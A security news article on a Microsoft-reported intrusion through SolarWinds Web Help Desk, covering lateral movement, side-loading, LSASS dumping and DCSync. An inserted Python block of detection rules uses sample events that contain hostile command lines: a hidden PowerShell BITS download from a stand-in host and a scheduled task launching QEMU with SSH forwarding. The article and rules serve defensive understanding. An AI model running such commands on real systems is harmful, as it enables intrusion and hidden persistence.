Microsoft has recently detailed a sophisticated multi-stage intrusion that began with threat actors exploiting internet-exposed SolarWinds Web Help Desk (WHD) instances. This initial access point allowed attackers to move laterally within the victim’s network and target high-value assets. The incident, which occurred in December 2025, highlights ongoing cybersecurity challenges and the critical need for timely patching of internet-facing services.
Microsoft’s Defender Security Research Team observed the attackers leveraging vulnerabilities in the SolarWinds WHD software to gain a foothold. While the exact flaw remains unconfirmed, speculation points to either recently disclosed vulnerabilities (CVE-2025-40551 and CVE-2025-40536) or a previously patched flaw (CVE-2025-26399). Researchers noted that the attacks coincided with machines being vulnerable to both older and newer CVEs, making precise attribution difficult.
Exploiting SolarWinds WHD for Initial Access
The vulnerabilities in question present significant security risks. CVE-2025-40536 is described as a security control bypass flaw, potentially allowing unauthenticated attackers to access restricted functionalities. Both CVE-2025-40551 and CVE-2025-26399 are untrusted data deserialization vulnerabilities, which could enable remote code execution. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently added CVE-2025-40551 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of its active exploitation and mandating fixes for federal agencies by early February 2026.
In the observed attacks, the successful exploitation of an exposed SolarWinds WHD instance granted attackers the ability to execute remote code without authentication. This allowed them to run arbitrary commands within the WHD application. According to the research team, the compromised WHD service subsequently launched PowerShell, utilizing the Background Intelligent Transfer Service (BITS) to download and execute malicious payloads.
Lateral Movement and Persistence Techniques
Following the initial compromise, the threat actors employed legitimate components associated with Zoho ManageEngine, a remote monitoring and management (RMM) solution, to establish persistent remote control over the infected systems. This allowed them to further their objectives within the network.
The attackers then proceeded with a series of covert actions aimed at escalating their privileges and maintaining access. This included enumerating sensitive domain users and groups, with a particular focus on Domain Admins. To ensure persistence, they established reverse SSH and RDP access. Additionally, the attackers attempted to create scheduled tasks designed to launch a QEMU virtual machine during system startup, a tactic potentially used to mask their activities within a virtualized environment while simultaneously exposing SSH access through port forwarding.
In some instances, the attackers utilized a DLL side-loading technique on compromised hosts. They leveraged “wab.exe,” a legitimate executable file linked to Windows Address Book, to load a rogue DLL named “sspicli.dll.” This malicious DLL was used to dump the contents of LSASS memory, a critical step in conducting credential theft and gaining access to sensitive user information.
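The chain described in the preceding paragraphs (the WHD service spawning PowerShell with a BITS download, the wab.exe/sspicli.dll side-load, and the QEMU scheduled task) expressed as toy detection rules run over constructed Sysmon-style events. This is an added example, not code from Microsoft's report; the event field names, the WHD service path and the sample command lines are assumptions.

```python
import re

# Constructed Sysmon-style events (not real telemetry); field names and the WHD
# service path are assumptions, not values from the report.
EVENTS = [
    {"id": 1, "kind": "process_create", "parent": r"C:\Program Files\SolarWinds\WebHelpDesk\bin\tomcat\bin\tomcat.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden Start-BitsTransfer -Source http://example.invalid/a.bin -Destination C:\\Windows\\Temp\\a.bin"},
    {"id": 2, "kind": "image_load", "image": r"C:\Users\Public\wab.exe", "loaded": r"C:\Users\Public\sspicli.dll"},
    {"id": 3, "kind": "image_load", "image": r"C:\Program Files\Windows Mail\wab.exe", "loaded": r"C:\Windows\System32\sspicli.dll"},
    {"id": 4, "kind": "process_create", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc onstart /tn Updater /tr "C:\\ProgramData\\q\\qemu-system-x86_64.exe -hda d.qcow2 -netdev user,id=n,hostfwd=tcp::2222-:22"'},
    {"id": 5, "kind": "process_create", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell Get-Date"},
]
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")

def _base(path):
    return path.rsplit("\\", 1)[-1].lower()

def whd_spawns_shell(ev):
    """WHD service process launching a shell; BITS in the command line raises severity."""
    if ev["kind"] != "process_create" or "webhelpdesk" not in ev["parent"].lower():
        return None
    if _base(ev["image"]) not in SHELLS:
        return None
    bits = re.search(r"start-bitstransfer|bitsadmin", ev["cmdline"], re.I)
    return "whd_to_shell_bits" if bits else "whd_to_shell"

def wab_sideload(ev):
    """wab.exe loading sspicli.dll from anywhere but the Windows system directories."""
    if ev["kind"] != "image_load" or _base(ev["image"]) != "wab.exe":
        return None
    if _base(ev["loaded"]) != "sspicli.dll" or ev["loaded"].lower().startswith(SYSTEM_DIRS):
        return None
    return "wab_sspicli_sideload"

def qemu_startup_task(ev):
    """schtasks creating a task that runs QEMU; hostfwd hints at the SSH port forward."""
    if ev["kind"] != "process_create" or _base(ev["image"]) != "schtasks.exe":
        return None
    cl = ev["cmdline"].lower()
    if "/create" in cl and "qemu" in cl:
        return "qemu_scheduled_task" + ("_sshfwd" if "hostfwd" in cl else "")
    return None

def run_rules(events, rules=(whd_spawns_shell, wab_sideload, qemu_startup_task)):
    """Return [(event id, rule name)] for every event matched by a rule."""
    return [(ev["id"], name) for ev in events for r in rules if (name := r(ev))]
```

Event 3 (the genuine wab.exe loading sspicli.dll from System32) and event 5 (an interactive PowerShell) are the benign controls and must not alert.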
Microsoft further reported that, in at least one observed case, the threat actors executed a DCSync attack. This technique involves simulating a Domain Controller to request password hashes and other sensitive authentication data directly from the Active Directory database, providing attackers with a broad set of credentials.
Recommendations and Future Outlook
To mitigate the risks associated with such intrusions, Microsoft advises organizations to keep their SolarWinds WHD instances up to date with the latest security patches. They also recommend actively searching for and removing any unauthorized RMM tools, rotating service and administrator account credentials periodically, and isolating compromised machines to contain potential breaches. This incident underscores the significant risk posed by a single exposed application when vulnerabilities are not promptly addressed or adequately monitored.
The attackers’ reliance on “living-off-the-land” techniques, utilizing legitimate administrative tools and low-noise persistence mechanisms, highlights the growing sophistication of threat actors. These tactics emphasize the importance of a defense-in-depth strategy, which includes timely patching of all internet-facing services and robust, behavior-based detection capabilities across identity, endpoint, and network layers. Organizations should remain vigilant, as the exploitation of such vulnerabilities is likely to continue as attackers seek easier routes into corporate networks. The ongoing efforts by CISA and Microsoft to identify and publicize these threats are crucial for improving overall cybersecurity resilience.